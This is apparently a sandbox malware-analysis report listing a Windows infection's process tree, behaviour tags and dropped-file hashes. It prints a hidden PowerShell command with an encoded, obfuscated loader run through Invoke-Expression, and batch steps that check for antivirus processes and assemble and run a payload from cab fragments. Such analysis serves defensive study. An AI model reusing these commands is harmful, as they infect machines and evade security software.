                                                                                                                                PID:1380
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-P5GSN.tmp\Bell_Setup16.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-P5GSN.tmp\Bell_Setup16.tmp" /SL5="$4016C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1684
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2168
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-6OQH9.tmp\Bell_Setup16.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-6OQH9.tmp\Bell_Setup16.tmp" /SL5="$5016C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                      11⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:2104
                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                                                                                                                                        12⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:2616
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1912
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10045200101\3983dd569f.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10045200101\3983dd569f.exe"
                                                                                                                                8⤵
                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2308
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045200101\3983dd569f.exe"
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2360
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10380550101\9466d42c25.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10380550101\9466d42c25.exe"
                                                                                                                            6⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:2332
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381540101\0e98dc5b32.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381540101\0e98dc5b32.exe"
                                                                                                                            6⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:1160
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2216
                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 2216 -s 28
                                                                                                                              7⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:388
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381570101\a78a01cd4a.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381570101\a78a01cd4a.exe"
                                                                                                                            6⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:1412
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2220
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2384
                                                                                                                            • C:\Windows\SysWOW64\CMD.exe
                                                                                                                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                              7⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1624
                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                tasklist
                                                                                                                                8⤵
                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:1528
                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                findstr /I "opssvc wrsa"
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:888
                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                tasklist
                                                                                                                                8⤵
                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:1540
                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1560
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c md 418377
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2236
                                                                                                                              • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                extrac32 /Y /E Leon.cab
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1508
                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                findstr /V "BEVERAGES" Compilation
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1984
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2680
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2716
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                                                                Passwords.com N
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                PID:1968
                                                                                                                              • C:\Windows\SysWOW64\choice.exe
                                                                                                                                choice /d y /t 5
                                                                                                                                8⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1916
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381600101\TbV75ZR.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381600101\TbV75ZR.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2880
                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 2880 -s 44
                                                                                                                              7⤵
                                                                                                                                PID:2244
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1100
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"
                                                                                                                              6⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2704
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"
                                                                                                                                7⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2580
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                  8⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:1924
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2432
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Boot or Logon Autostart Execution: Active Setup
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:812

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                                    Filesize

                                                                                                                    71KB

                                                                                                                    MD5

                                                                                                                    83142242e97b8953c386f988aa694e4a

                                                                                                                    SHA1

                                                                                                                    833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                                                                                    SHA256

                                                                                                                    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                                                                                    SHA512

                                                                                                                    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe

                                                                                                                    Filesize

                                                                                                                    1.2MB

                                                                                                                    MD5

                                                                                                                    646254853368d4931ced040b46e9d447

                                                                                                                    SHA1

                                                                                                                    c9e4333c6feb4f0aeedf072f3a293204b9e81e28

                                                                                                                    SHA256

                                                                                                                    5a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e

                                                                                                                    SHA512

                                                                                                                    485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

                                                                                                                    Filesize

                                                                                                                    1.7MB

                                                                                                                    MD5

                                                                                                                    6d7adc96b310e80799325edca02ff778

                                                                                                                    SHA1

                                                                                                                    35d97327d3d1c5ce920051d0552b2ee510bb919d

                                                                                                                    SHA256

                                                                                                                    e5186a04536313599bea259d6fefac44b168d81e08dcc36e54b2c6ff08374efd

                                                                                                                    SHA512

                                                                                                                    feb351fa6d4f4d342ff8456812fd2c9dfba8122b94e6c2d11ec4b045f4975d9f0dc2b6388d9e4c6d4ab98287bc6dc56369e5c96f10cf0b62ad7a2f81ba821212

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe

                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                    MD5

                                                                                                                    3928c62b67fc0d7c1fb6bcce3b6a8d46

                                                                                                                    SHA1

                                                                                                                    e843b7b7524a46a273267a86e320c98bc09e6d44

                                                                                                                    SHA256

                                                                                                                    630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397

                                                                                                                    SHA512

                                                                                                                    1884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe

                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                    MD5

                                                                                                                    28b543db648763fac865cab931bb3f91

                                                                                                                    SHA1

                                                                                                                    b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4

                                                                                                                    SHA256

                                                                                                                    701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906

                                                                                                                    SHA512

                                                                                                                    7d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe

                                                                                                                    Filesize

                                                                                                                    7.6MB

                                                                                                                    MD5

                                                                                                                    c616cffc69c05e612af6883e818b435c

                                                                                                                    SHA1

                                                                                                                    7b87430798207bd6df970b17ce017629f002edcd

                                                                                                                    SHA256

                                                                                                                    82529e8e134e4587ea5f4b26fab715a84fd00c2fd71a5cfc2cd77afae72fadaf

                                                                                                                    SHA512

                                                                                                                    4d9fe28683abddc75e0347c8b4c4d478f5c3d9e564bcca9127152f638afa9b03a8bd938a35ab777b2726e4574ef77b5296fac50036159cc4de7e22f52922a2ac

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10045200101\3983dd569f.exe

                                                                                                                    Filesize

                                                                                                                    4.3MB

                                                                                                                    MD5

                                                                                                                    4ea661c85a082117e59ea78f2f140a1c

                                                                                                                    SHA1

                                                                                                                    49940f31bc96b08d70c1ef56d010ea320f9bbb74

                                                                                                                    SHA256

                                                                                                                    389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a

                                                                                                                    SHA512

                                                                                                                    df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd

                                                                                                                    Filesize

                                                                                                                    1.4MB

                                                                                                                    MD5

                                                                                                                    2f0f5fb7efce1c965ff89e19a9625d60

                                                                                                                    SHA1

                                                                                                                    622ff9fe44be78dc07f92160d1341abb8d251ca6

                                                                                                                    SHA256

                                                                                                                    426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

                                                                                                                    SHA512

                                                                                                                    b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10374380101\93d81ab9fe.exe

                                                                                                                    Filesize

                                                                                                                    655KB

                                                                                                                    MD5

                                                                                                                    a5d54aec929d9e29b3d1f6fa41be18d3

                                                                                                                    SHA1

                                                                                                                    ff930ca08e51c881e715368278dc2b40025ed8ad

                                                                                                                    SHA256

                                                                                                                    1cf669c3b5d3f77681ace20b2d974b380e729382ad38cad33b1810f9750fa94b

                                                                                                                    SHA512

                                                                                                                    73cc01b6495ca0ff7e360b90dc1e9f2beccc5d012c745aa4ce84158ecfdb5f99fb7da91207cfbf9188f34e59932f8fe184fd6f4d7b14dd2d0c19b21e5aa5c2c3

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10374380101\93d81ab9fe.exe

                                                                                                                    Filesize

                                                                                                                    327KB

                                                                                                                    MD5

                                                                                                                    dfbc5f5696ac1ed176979706f40923e8

                                                                                                                    SHA1

                                                                                                                    b3ad04189502558184037ae150f1ae4e50927560

                                                                                                                    SHA256

